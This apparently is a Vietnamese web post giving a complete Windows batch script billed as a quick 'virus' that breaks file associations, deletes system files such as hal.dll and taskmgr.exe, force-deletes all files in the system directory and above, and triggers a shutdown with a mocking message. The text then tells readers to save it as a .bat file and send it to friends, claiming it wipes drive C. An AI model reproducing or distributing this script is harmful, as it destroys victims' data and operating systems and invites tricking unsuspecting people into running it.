Hướng dẫn tạo virus phá windows nhanh gọn lẹ


@Echo Off
@cls
@title welcome to nhoit
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown Thanks neu cai lai win -s -t 06 -c " Fatal loi #1337, Duck!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit

Copy vào Notepad sau đó đổi tên file thành (.bat) có thể gửi cho bạn bè nếu muốn , click vào Nó sẽ xóa tất cả những gì có trong ổ C bao gồm Cookie,Windows,Sytem vv…


Bình luận

Email của bạn sẽ không được hiển thị công khai.